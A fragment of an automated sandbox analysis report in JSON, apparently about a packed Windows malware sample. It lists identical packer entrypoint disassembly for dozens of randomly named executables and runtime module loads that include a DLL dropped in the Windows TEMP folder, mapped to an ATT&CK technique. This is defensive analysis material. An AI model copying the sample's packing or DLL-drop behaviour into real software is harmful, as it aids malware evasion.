0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nbdbxn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tlvnl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dtrfjn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lvttpxb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lxvdh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jbbxlvh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4408646.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"86668.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"08086.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"624642.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"48064.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lxdxh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hltjhx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fnlpb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" loaded module \"MSVCRT.DLL\" at base 76020000\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" loaded module \"SHLWAPI.DLL\" at base 77440000\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" loaded module \"USER32.DLL\" at base 75f50000\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"4822004.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"4822004.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4822004.exe\" loaded module \"KERNEL32\" at base 76380000\n \"4822004.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4822004.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"26224.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"26224.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"26224.exe\" loaded module \"KERNEL32\" at base 76380000\n \"26224.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"26224.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"226242.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"226242.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"226242.exe\" loaded module \"KERNEL32\" at base 76380000\n \"226242.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"226242.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"8402624.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"484648.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"484648.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"484648.exe\" loaded module \"KERNEL32\" at base 76380000\n \"484648.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"484648.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"20484.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"20484.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"20484.exe\" loaded module \"KERNEL32\" at base 76380000\n \"20484.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"20484.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"806288.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"806288.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"806288.exe\" loaded module \"KERNEL32\" at base 76380000\n \"806288.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"806288.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"806288.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"hrrrr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"hrrrr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hrrrr.exe\" loaded module \"KERNEL32\" at base 76380000\n \"hrrrr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hrrrr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"vvvtjhp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"vvvtjhp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vvvtjhp.exe\" loaded module \"KERNEL32\" at base 76380000\n \"vvvtjhp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vvvtjhp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"lpljbv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"lpljbv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lpljbv.exe\" loaded module \"KERNEL32\" at base 76380000\n \"lpljbv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lpljbv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"rjldjr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"rjldjr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rjldjr.exe\" loaded module \"KERNEL32\" at base 76380000\n \"rjldjr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rjldjr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"ljlpvrx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"ljlpvrx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ljlpvrx.exe\" loaded module \"KERNEL32\" at base 76380000\n \"ljlpvrx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ljlpvrx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"2046660.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"2046660.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2046660.exe\" loaded module \"KERNEL32\" at base 76380000\n \"2046660.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2046660.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"jtjnrb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"jtjnrb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jtjnrb.exe\" loaded module \"KERNEL32\" at base 76380000\n \"jtjnrb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jtjnrb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"nxlhfx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"nxlhfx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nxlhfx.exe\" loaded module \"KERNEL32\" at base 76380000\n \"nxlhfx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nxlhfx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"pddnp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"pddnp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pddnp.exe\" loaded module \"KERNEL32\" at base 76380000\n \"pddnp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pddnp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"tplfhb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"60202.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"60202.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"60202.exe\" loaded module \"KERNEL32\" at base 76380000\n \"60202.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"60202.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"24826.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"24826.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24826.exe\" loaded module \"KERNEL32\" at base 76380000\n \"24826.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"24826.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"hpdphl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"hpdphl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hpdphl.exe\" loaded module \"KERNEL32\" at base 76380000\n \"hpdphl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hpdphl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"vfdxfvl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"vfdxfvl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vfdxfvl.exe\" loaded module \"KERNEL32\" at base 76380000\n \"vfdxfvl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vfdxfvl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"4022682.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"4022682.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4022682.exe\" loaded module \"KERNEL32\" at base 76380000\n \"4022682.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4022682.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"6244848.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"6244848.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6244848.exe\" loaded module \"KERNEL32\" at base 76380000\n \"6244848.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6244848.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"6244848.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"rfbfjv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"rfbfjv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rfbfjv.exe\" loaded module \"KERNEL32\" at base 76380000\n \"rfbfjv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bjvtfxj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"bjvtfxj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bjvtfxj.exe\" loaded module \"KERNEL32\" at base 76380000\n \"bjvtfxj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bjvtfxj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"bjvtfxj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"4622600.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"4622600.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4622600.exe\" loaded module \"KERNEL32\" at base 76380000\n \"4622600.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4622600.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"08622.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"08622.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"08622.exe\" loaded module \"KERNEL32\" at base 76380000\n \"08622.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"08622.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"24808.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"ftpltv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"ftpltv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ftpltv.exe\" loaded module \"KERNEL32\" at base 76380000\n \"ftpltv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ftpltv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"bvrxv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"bvrxv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bvrxv.exe\" loaded module \"KERNEL32\" at base 76380000\n \"bvrxv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bvrxv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"lbbnbl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"tjbjhtr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"tjbjhtr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tjbjhtr.exe\" loaded module \"KERNEL32\" at base 76380000\n \"tjbjhtr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tjbjhtr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"fnnbp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"vpfhrjh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"fxbfvbf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"fxbfvbf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fxbfvbf.exe\" loaded module \"KERNEL32\" at base 76380000\n \"fxbfvbf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fxbfvbf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"ltbfnb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"ltbfnb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ltbfnb.exe\" loaded module \"KERNEL32\" at base 76380000\n \"ltbfnb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ltbfnb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"48080.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75000000\n \"626080.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"626080.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"626080.exe\" loaded module \"KERNEL32\" at base 76380000\n \"626080.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"626080.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"dlbjrj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"dlbjrj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dlbjrj.exe\" loaded module \"KERNEL32\" at base 76380000\n \"dlbjrj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dvxnn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"dvxnn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dvxnn.exe\" loaded module \"KERNEL32\" at base 76380000\n \"dvxnn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dvxnn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"nndlvj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"nndlvj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nndlvj.exe\" loaded module \"KERNEL32\" at base 76380000\n \"nndlvj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nndlvj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000\n \"hltjhx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c90000\n \"hltjhx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hltjhx.exe\" loaded module \"KERNEL32\" at base 76380000\n \"hltjhx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hltjhx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c270000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", 